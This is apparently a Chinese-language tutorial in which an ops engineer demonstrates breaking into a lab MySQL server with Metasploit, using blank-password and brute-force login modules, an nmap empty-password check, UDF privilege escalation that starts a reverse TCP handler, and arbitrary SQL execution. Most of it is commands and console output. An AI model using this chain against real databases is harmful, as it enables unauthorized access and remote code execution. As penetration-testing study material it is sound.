Metasploit Framework
(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit
可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit
是采用Perl
语言编写的,但是再后来的新版中,改成了用Ruby
语言编写的了。在kali
中,自带了Metasploit
工具。
这里运维朱工全程演示如何快速渗透MySQL服务,也提示如何做好防护。
登录msf
代码语言:bash {.line-numbers}复制# 登录msf
┌──(root㉿kali)-[~]
└─# msfconsole
使用mysql_login
模块
该模块可用于暴力破解,或者空密码检测。
代码语言:shell复制# 查找MySQL登录模块
msf6 > search mysql_login
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/mysql/mysql_login normal No MySQL Login Utility
Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/mysql/mysql_login
# 使用模块,可以指定模块名或者使用id
msf6 > use 0
或者
msf6 > use auxiliary/scanner/mysql/mysql_login
# 显示参数选项,Required为yes则表示需要提供值,有的选项会有默认值(Current Setting)
msf6 auxiliary(scanner/mysql/mysql_login) > show options
Module options (auxiliary/scanner/mysql/mysql_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS true no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
DB_SKIP_EXISTING none no Skip existing credentials stored in the current database (Accepted:
none, user, user&realm)
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framewo
rk/wiki/Using-Metasploit
RPORT 3306 yes The target port (TCP)
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME root no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per
line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
mysql_login
空密码检测
空密码检测的前提是MySQL
对当前的主机开放了权限。常见的危险命令就是授权时直接使用%
,这表示所有主机均可连接。
# 空密码检测:
## 设置远程主机即可,USERNAME默认是root,BLANK_PASSWORDS默认是true
msf6 auxiliary(scanner/mysql/mysql_login) > set rhosts 192.168.75.121
rhosts => 192.168.75.121
msf6 auxiliary(scanner/mysql/mysql_login) > run
[ ] 192.168.75.121:3306 - 192.168.75.121:3306 - Found remote MySQL version 5.5.68
[ ] 192.168.75.121:3306 - 192.168.75.121:3306 - Success: 'root:'
[*] 192.168.75.121:3306 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
mysql_login
密码爆破
代码语言:shell复制# 准备密码文件
cat >/ tmp/passwd.txt <<EOF
123456
root123456
EOF
# 设置远程主机
msf6 auxiliary(scanner/mysql/mysql_login) > set rhosts 192.168.75.121
rhosts => 192.168.75.121
# 设置root登录密码
msf6 auxiliary(scanner/mysql/mysql_login) > set pass_file /tmp/passwd.txt
pass_file => /tmp/passwd.txt
# 攻击,可以看到密码root123456是正确的。
msf6 auxiliary(scanner/mysql/mysql_login) > run
[ ] 192.168.75.121:3306 - 192.168.75.121:3306 - Found remote MySQL version 5.5.68
[-] 192.168.75.121:3306 - 192.168.75.121:3306 - LOGIN FAILED: root: (Incorrect: Access denied for user 'root'@'192.168.75.123' (using password: NO))
[-] 192.168.75.121:3306 - 192.168.75.121:3306 - LOGIN FAILED: root:123456 (Incorrect: Access denied for user 'root'@'192.168.75.123' (using password: YES))
[ ] 192.168.75.121:3306 - 192.168.75.121:3306 - Success: 'root:root123456'
[*] 192.168.75.121:3306 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
nmap
空密码检测
代码语言:shell复制msf6 > nmap -p3306 --script=mysql-empty-password.nse 192.168.75.121
# db_nmap会将扫描结果同步到数据库中,需提前配置好数据库连接
msf6 > db_nmap -p3306 --script=mysql-empty-password.nse 192.168.75.121
[*] Nmap: Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-12 14:44 CST
[*] Nmap: Nmap scan report for 192.168.75.121
[*] Nmap: Host is up (0.00089s latency).
[*] Nmap: PORT STATE SERVICE
[*] Nmap: 3306/tcp open mysql
[*] Nmap: | mysql-empty-password:
[*] Nmap: |_ root account has empty password
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 0.39 seconds
UDF提权
使用mysql_udf_payload
上传lib模块
代码语言:shell复制msf6 > search udf
msf6 > use 3
msf6 exploit(multi/mysql/mysql_udf_payload) > how options
msf6 exploit(multi/mysql/mysql_udf_payload) > set rhosts 192.168.75.121
msf6 exploit(multi/mysql/mysql_udf_payload) > set password root123456
msf6 exploit(multi/mysql/mysql_udf_payload) > run
[*] Started reverse TCP handler on 192.168.75.143:4444
[*] 192.168.75.121:3306 - Checking target architecture...
[*] 192.168.75.121:3306 - Checking for sys_exec()...
[*] 192.168.75.121:3306 - Checking target architecture...
[*] 192.168.75.121:3306 - Checking for MySQL plugin directory...
[*] 192.168.75.121:3306 - Target arch (linux64) and target path both okay.
[*] 192.168.75.121:3306 - Uploading lib_mysqludf_sys_64.so library to /usr/lib64/mysql/plugin/nixZkpEs.so...
[*] 192.168.75.121:3306 - Checking for sys_exec()...
[*] 192.168.75.121:3306 - Command Stager progress - 55.47% done (1444/2603 bytes)
[*] 192.168.75.121:3306 - Command Stager progress - 100.00% done (2603/2603 bytes)
[*] Exploit completed, but no session was created.
如果在
run
时报错,提示无法创建xxx.so
文件,则表示没有相关权限,远程服务器有设置selinux
,以及/usr/lib64/mysql/plugin/
目录没有写权限,都会导致上面的问题。
使用mysql_sql
执行攻击sql语句
上传完模块之后即可执行相关sql语句了。
代码语言:shell复制# 查找mysql_sql模块
msf6 exploit(multi/mysql/mysql_udf_payload) > search mysql_sql
# 选择第一个
msf6 exploit(multi/mysql/mysql_udf_payload) > use 0
# 设置远程主机
msf6 auxiliary(admin/mysql/mysql_sql) > set rhosts 192.168.75.121
rhosts => 192.168.75.121
# 设置密码(密码来自前面的破解)
msf6 auxiliary(admin/mysql/mysql_sql) > set password root123456
password => root123456
# 设置用户
msf6 auxiliary(admin/mysql/mysql_sql) > set username root
username => root
# 默认执行查看数据库版本的sql语句
msf6 auxiliary(admin/mysql/mysql_sql) > run
[*] Running module against 192.168.75.121
[*] 192.168.75.121:3306 - Sending statement: 'select version()'...
[*] 192.168.75.121:3306 - | 5.5.68-MariaDB |
[*] Auxiliary module execution completed
# 执行自定义sql语句
msf6 auxiliary(admin/mysql/mysql_sql) > set sql "select user,host from mysql.user"
sql => select user,host from mysql.user
msf6 auxiliary(admin/mysql/mysql_sql) > run
[*] Running module against 192.168.75.121
[*] 192.168.75.121:3306 - Sending statement: 'select user,host from mysql.user'...
[*] 192.168.75.121:3306 - | root | % |
[*] 192.168.75.121:3306 - | test | % |
[*] 192.168.75.121:3306 - | root | 127.0.0.1 |
[*] 192.168.75.121:3306 - | | 192-168-75-121 |
[*] 192.168.75.121:3306 - | root | 192-168-75-121 |
[*] 192.168.75.121:3306 - | root | ::1 |
[*] 192.168.75.121:3306 - | | localhost |
[*] 192.168.75.121:3306 - | root | localhost |
[*] Auxiliary module execution completed